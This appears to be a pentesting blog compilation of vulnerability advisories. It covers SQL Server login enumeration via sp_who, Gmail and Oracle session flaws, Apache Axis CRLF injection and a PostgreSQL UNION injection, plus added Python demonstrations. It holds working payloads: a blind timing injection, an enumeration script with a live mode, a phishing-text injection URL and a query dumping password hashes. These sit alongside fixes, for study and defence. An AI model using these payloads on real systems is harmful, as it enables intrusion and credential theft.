www.notsosecure.com

From Pentesters To Pentesters

In SQL Server 2005, if you are not 'sa' you can't do much. This is primarily because OPENROWSET is not available by default: ad hoc distributed queries are disabled, and turning them on requires sysadmin rights. The stored procedure sp_who, on the other hand, is executable by public (in both SQL Server 2000 and 2005). According to the documentation it "provides information about current Microsoft SQL Server users and processes".

Enumeration:

exec sp_who 'validuser';

returns no records (you lack the permission to see other users' sessions), but no error either :)

-------------------------

exec sp_who 'invaliduser';

returns an error:

Msg 15007, Level 16, State 1, Procedure sp_who, Line 59
'invaliduser' is not a valid login or you do not have permission.

Despite the wording of that message, a valid login you are not allowed to see produces no error at all, so the two cases are trivially distinguishable.

————————

Hence, you can enumerate login names. You can also enumerate Windows users (if mixed mode authentication is enabled) like this:

exec sp_who 'test-system\Administrator'

and possibly domain users as well, depending on which domain accounts are allowed to connect (typically domain admins).

You need to know a valid machine name or domain name for this to work. That is rarely a problem, as it can be obtained from:

1. IIS NTLM authentication, which discloses the machine name and domain name (use hoppy).
2. The Terminal Services logon dialog box.
3. sp_who itself, which returns the hostname in its output.
4. Several other sources.

Once you have enumerated users, you know what to do next: password guessing against the enumerated accounts over other services, e.g. RDP, SMB etc.

Through a SQL injection, use this PoC to enumerate logins (assuming a blind injection):

http://127.0.0.1/upload/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEM\blah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'--

When the login is valid, sp_who returns without error and execution falls through to WAITFOR, so the response takes 20 seconds. When it is invalid, error 15007 is raised, the RETURN in the CATCH block ends the batch before the delay, and the response comes back immediately.

Burp logs showing the HTTP request
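The timing oracle above, scripted over a list of candidate logins. This is an added example, not code from the original post: the target URL and the qid parameter are taken from the PoC, the candidate names and the "valid" set used by the offline stand-in are made up, and a real engagement would measure the baseline and threshold against the actual target.

```python
"""Blind login enumeration through the sp_who error oracle.

Added example, not from the original post. It scripts the time-based check
described above: sp_who raises error 15007 for an unknown login, so the
CATCH branch's RETURN ends the batch before WAITFOR; a valid login falls
through to the delay. Target URL, parameter name (qid) and candidate
logins are assumptions taken from the post's PoC.
"""
import re
import time
import urllib.parse
import urllib.request

BASE_URL = "http://127.0.0.1/upload/sqlinjection/"  # assumed injection point


def sp_who_probe_sql(login, delay_seconds=20):
    """T-SQL appended to the injected parameter for one candidate login."""
    hms = "%02d:%02d:%02d" % (delay_seconds // 3600,
                              delay_seconds % 3600 // 60,
                              delay_seconds % 60)
    # Double any single quote so a quote in a candidate cannot break the probe.
    safe_login = login.replace("'", "''")
    return (";BEGIN TRY exec sp_who '%s' END TRY BEGIN CATCH return END CATCH "
            "waitfor delay '%s'--" % (safe_login, hms))


def build_url(base_url, qid, login, delay_seconds=20):
    """URL-encode the whole parameter value, spaces and quotes included."""
    value = str(qid) + sp_who_probe_sql(login, delay_seconds)
    return base_url + "?qid=" + urllib.parse.quote(value, safe="")


def http_timed_get(url, timeout=60):
    """Return elapsed seconds for a real request; error pages count too."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except OSError:  # HTTPError, URLError, timeouts: only the timing matters
        pass
    return time.monotonic() - start


def enumerate_logins(candidates, timed_get, base_url=BASE_URL, qid=1,
                     delay_seconds=20):
    """Return the candidates whose probe was delayed well beyond the baseline.

    timed_get(url) -> seconds is injected so the logic can run offline.
    """
    baseline = timed_get(base_url + "?qid=" + str(qid))  # no sp_who, no delay
    threshold = baseline + delay_seconds / 2.0  # tolerate network jitter
    found = []
    for login in candidates:
        elapsed = timed_get(build_url(base_url, qid, login, delay_seconds))
        if elapsed >= threshold:
            found.append(login)
    return found


# ---- constructed stand-in for the target, so the script runs offline ----
SIMULATED_VALID_LOGINS = {"sa", "TEST-SYSTEM\\Administrator"}  # made up


def simulated_timed_get(url):
    """Mimic the server: a fast reply unless sp_who is given a valid login."""
    query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    injected = query.get("qid", [""])[0]
    latency = 0.3
    who = re.search(r"exec sp_who '(.*?)' END TRY", injected)
    wait = re.search(r"waitfor delay '(\d+):(\d+):(\d+)'", injected)
    if who and wait and who.group(1).replace("''", "'") in SIMULATED_VALID_LOGINS:
        h, m, s = (int(x) for x in wait.groups())
        latency += h * 3600 + m * 60 + s
    return latency


if __name__ == "__main__":
    names = ["sa", "bob", "TEST-SYSTEM\\Administrator", "TEST-SYSTEM\\blah"]
    print(enumerate_logins(names, simulated_timed_get))
    # Against a live target: enumerate_logins(names, http_timed_get)
```

Two design points worth noting: the candidate is single-quote-escaped so a malformed name cannot turn a "no delay" into a syntax error that looks the same as an invalid login, and the threshold is measured relative to a baseline request rather than hard-coded, since a slow link would otherwise turn every candidate into a false positive.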

If you are concerned about the security of your email, accessing Gmail from a mobile device may not be a great idea.

1. A few weeks ago, Google introduced a new Gmail setting that forces the session to use HTTPS only and never HTTP. Unfortunately this does not apply to Google Mobile (http://mobile.google.com/): even with the preference set to HTTPS only, Gmail accessed from a mobile device still makes requests over HTTP. The HTTP request happens in the background, and the clear-text response contains all the session cookies as well as an HTTPS URL.

2. To make matters worse, this URL returned over port 80 carries the session ID in the URL itself and is on its own sufficient to access the mailbox (the attacker does not need your session cookie). So if your mobile device goes through a proxy server and an attacker manages to read the proxy logs, they will have the URL with the session ID, which is rather more concerning. Of course, once you log out the URL is no longer valid, so the attack is time-limited.

Update: Google has fixed the second issue and does not appear too keen to fix the first one.

Oracle 10g Express Edition does not invalidate the www_flow_user2 cookie on the server when the user logs off, so a cookie captured during a session can still be replayed after the user has logged out.

Tested in version:- Oracle 10g Express edition 10.2.0.1.0, other versions may also be vulnerable.

Patch:- Oracle CPU April 2008

Version tested:- 1.4

Vendor's website:- http://ws.apache.org/axis/

Details:- The vulnerability reported earlier this year was later addressed by the Apache Axis group, and the error messages in version 1.4 no longer leak the document root or any directory structure. However, the error message returned for a non-existent WSDL is still vulnerable to CRLF injection. All user input is HTML-encoded, which rules out XSS or HTML injection, but the carriage returns and line feeds survive into the body of the plain-text error page, so content injection (attacker-controlled lines of text in the page) is still possible. This is a minor issue: the injected CR/LF land in the response body, not in the headers, so it is text spoofing rather than response splitting.

Exploit:- http://victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d%0a---------------------%0d%0aAn%20Error%20has%20Occured%0d%0a%0d%0aplease%20send%20your%20credentials%20and%20problem%20encountered%20to%20%0d%0ablah@blah.com%0d%0a--------------%0d%0a%0d%0a%0d%0a.jws?wsdl

Output:-

AXIS error

Sorry, something seems to have gone wrong... here are the details:

Fault - ; nested exception is:

java.io.FileNotFoundException: /tt_pm4l

---------------------

An Error has Occured

please send your credentials and problem encountered to

blah@blah.com

--------------

.jws

AxisFault

..

Original Advisory: http://www.portcullis-security.com/179.php 
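To make the "HTML-encoded but still injectable" point concrete, here is an added example, not Axis code: a constructed renderer modelled on the error page quoted above (the template text and the way the path is reduced to a file name are assumptions), a builder for the exploit URL, and a hardened renderer beside the vulnerable one.

```python
"""CRLF content injection into a plain-text error page.

Added example, not Axis code. The error page format is modelled on the
output quoted above; the renderer below is a constructed stand-in, not
Axis 1.4's implementation. It shows why HTML-encoding alone (which the
text says Axis 1.4 does) stops XSS but not content injection, and what
a hardened renderer does differently.
"""
import html
import urllib.parse

# Constructed template; wording taken from the error output shown above.
ERROR_TEMPLATE = (
    "AXIS error\n\n"
    "Sorry, something seems to have gone wrong... here are the details:\n\n"
    "Fault - ; nested exception is:\n"
    "\tjava.io.FileNotFoundException: /%s\n"
)


def exploit_url(host, injected_text, marker="tt_pm4l"):
    """Build a request like the PoC: a missing .jws whose name carries CR/LF."""
    name = marker + "\r\n\r\n" + injected_text + "\r\n\r\n" + ".jws"
    return "http://%s/axis/%s?wsdl" % (host, urllib.parse.quote(name, safe=""))


def path_from_url(url):
    """What the servlet container hands the application: the decoded path."""
    return urllib.parse.unquote(urllib.parse.urlparse(url).path)


def requested_name(path):
    """Assumed behaviour: strip the /axis/ prefix and the .jws suffix."""
    name = path[len("/axis/"):] if path.startswith("/axis/") else path
    return name[:-len(".jws")] if name.endswith(".jws") else name


def render_error_vulnerable(path):
    """html.escape() neutralises <, >, & and quotes but passes CR and LF,
    so attacker text still starts on lines of its own in the page."""
    return ERROR_TEMPLATE % html.escape(requested_name(path))


def sanitize_for_display(text):
    """Hardened: drop ASCII control characters before HTML-escaping."""
    visible = "".join(ch for ch in text if ch >= " " and ch != "\x7f")
    return html.escape(visible)


def render_error_hardened(path):
    return ERROR_TEMPLATE % sanitize_for_display(requested_name(path))


def injected_lines(rendered, marker="tt_pm4l"):
    """Non-empty lines the attacker controls: those after the marker's line.

    If the marker line did not end at the marker, the CR/LF were removed and
    nothing attacker-supplied starts a new line."""
    lines = rendered.splitlines()
    for i, line in enumerate(lines):
        if line.endswith(marker):
            return [l for l in lines[i + 1:] if l]
    return []


if __name__ == "__main__":
    url = exploit_url("victim", "An Error has Occured\r\n\r\n"
                      "please send your credentials to\r\nblah@blah.com")
    path = path_from_url(url)
    print(render_error_vulnerable(path))
    print(injected_lines(render_error_vulnerable(path)))   # attacker's lines
    print(injected_lines(render_error_hardened(path)))     # []
```

The hardened variant does not try to be clever about which control characters are harmful; anything below 0x20 (and DEL) is dropped before escaping, which also covers a bare CR or LF, vertical tab and form feed. HTML-escaping remains necessary for the XSS case, which is why the fix is an additional step rather than a replacement.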

The file /www/people/editprofile.php appears to be vulnerable to SQL injection at multiple points.

Exploitation is fairly easy: a single POST request returns all the usernames and password hashes from the backend database.

The hashes can then be cracked with John the Ripper.

Exploit:-

POST request to: /www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete

Works against a PostgreSQL database :) . The payload closes the IN list the array values are dropped into, appends a UNION ALL that concatenates user_name and unix_pw into the single column the original query returns, and comments out the rest of the statement.

Refer to the paper for exploiting SQL injection against a PostgreSQL database.
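The vulnerable PHP is not on the page, so the following added example replays the request body above against an assumed query shape (array values interpolated straight into an IN list) using sqlite3 as a stand-in for PostgreSQL: both accept the payload's UNION ALL, || concatenation and -- comment unchanged. The sample users, skills and hashes are constructed; the fixed function beside the vulnerable one shows the parameterised form.

```python
"""UNION injection through an array parameter, replayed on sqlite3.

Added example, not the vulnerable PHP (which is not on the page). The
query shape is assumed: values of skill_delete[] dropped straight into
an IN (...) list. sqlite3 stands in for PostgreSQL because both accept
the payload's UNION ALL, || concatenation and -- comment, so the request
body quoted above works unchanged against either.
"""
import sqlite3
import urllib.parse

# Request body from the post (the page's en dashes are really "--").
POST_BODY = ("skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+"
             "from+users--%3d1&MultiDelete=Delete")

# Constructed sample data; the hashes are placeholders, not real credentials.
SEED_SQL = """
CREATE TABLE users(user_id INTEGER, user_name TEXT, unix_pw TEXT);
CREATE TABLE skills(skill_id INTEGER, user_id INTEGER, name TEXT);
INSERT INTO users VALUES (1, 'alice', '$1$salt1$hashA');
INSERT INTO users VALUES (2, 'bob',   '$1$salt2$hashB');
INSERT INTO skills VALUES (484, 1, 'perl');
INSERT INTO skills VALUES (485, 1, 'sql');
INSERT INTO skills VALUES (486, 2, 'java');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def parse_skill_delete(body):
    """The PHP array parameter skill_delete[] as a list of strings."""
    return urllib.parse.parse_qs(body).get("skill_delete[]", [])


def lookup_skills_vulnerable(conn, skill_delete, user_id=1):
    """Assumed original: string concatenation. The payload closes the IN
    list, appends a UNION ALL and comments out the rest of the statement,
    so the result set carries user_name||unix_pw for every user."""
    sql = ("SELECT name FROM skills WHERE skill_id IN (%s) AND user_id=%d"
           % (",".join(skill_delete), user_id))
    return [row[0] for row in conn.execute(sql)]


def lookup_skills_fixed(conn, skill_delete, user_id=1):
    """Hardened: cast to int (rejects the payload) and bind every value."""
    ids = [int(v) for v in skill_delete]
    placeholders = ",".join("?" for _ in ids)
    sql = ("SELECT name FROM skills WHERE skill_id IN (%s) AND user_id=?"
           % placeholders)
    return [row[0] for row in conn.execute(sql, ids + [user_id])]


if __name__ == "__main__":
    conn = open_db()
    values = parse_skill_delete(POST_BODY)
    print(lookup_skills_vulnerable(conn, values))  # skills plus every user_name||unix_pw
    try:
        lookup_skills_fixed(conn, values)
    except ValueError as exc:
        print("rejected:", exc)
```

The fix relies on two independent controls: the int() cast makes the payload fail before any SQL is built, and the bound parameters would keep a non-numeric value inert even if the cast were removed later. Either alone closes this particular hole; together they do not depend on each other staying in place.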